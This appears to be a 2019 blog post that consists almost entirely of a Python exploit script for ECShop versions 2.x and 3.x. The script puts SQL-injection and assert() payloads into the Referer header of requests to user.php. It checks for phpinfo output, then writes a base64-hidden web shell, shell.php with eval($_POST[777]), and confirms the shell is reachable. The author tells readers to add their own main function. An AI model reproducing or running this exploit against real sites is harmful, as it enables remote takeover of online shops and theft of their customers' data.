ecshop v2 v3 EXP 

import requests
import binascii

def get_v2Payload(code):
	'''Ecshop V2.x payload'''
	code = "{$abc'];@assert(%s);//}" %(code)
#	print(code)
	code = code.encode()
	shellcode = binascii.hexlify(code).decode()
	payload = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" % ((50 + len(shellcode)),shellcode)
	return payload
def get_v3Payload(code):
	'''Ecshop V3.x payload'''
	code = "{$abc'];assert(%s);//}" %(code)
	code = code.encode()
	shellcode = binascii.hexlify(code).decode()
	payload = "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}45ea207d7a2b68c49582d2d22adf953a" % ((50 + len(shellcode)),shellcode)
	return payload
def verify(url):
	print(url)
	flag = "allow_url_include"
	code = "phpinfo()"
	url = url + "/user.php"
	ec2payload = get_v2Payload(code)
#	print(ec2payload)
	ec3payload = get_v3Payload(code)
	payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
	for payload,version in payloads:
		headers = {
			'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
			'Referer':payload
		}
		try:
			rsp = requests.get(url,headers=headers,timeout=3)
			if flag in rsp.text:
				verifyInfo = {}
				verifyInfo['URL'] = url
				verifyInfo['version'] = version
				print(verifyInfo)
				break
		except:
			pass
def getshell(url):
	code = "base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsLnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzc3N10pOyA/Picp')"
	i = url + "/user.php"
	ec2payload = get_v2Payload(code)
#	print(ec2payload)
	ec3payload = get_v3Payload(code)
	payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
	for payload,version in payloads:
		headers = {
			'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
			'Referer':payload
		}
		try:
			rsp = requests.get(i,headers=headers,timeout=5)
			if rsp.status_code == 200:
				shurl = url + "/shell.php"
				srsp = requests.get(shurl,timeout=5)
				if srsp.status_code == 200:
					verifyInfo = {}
					verifyInfo['URL'] = shurl
					verifyInfo['version'] = version
					print(verifyInfo)
					break
		except:
			pass

 大概就是这么个样子,具体要怎么用自己在添加主函数就行。

posted @ 2019-06-13 17:15  Spec·  阅读(668)  评论(0编辑  收藏  举报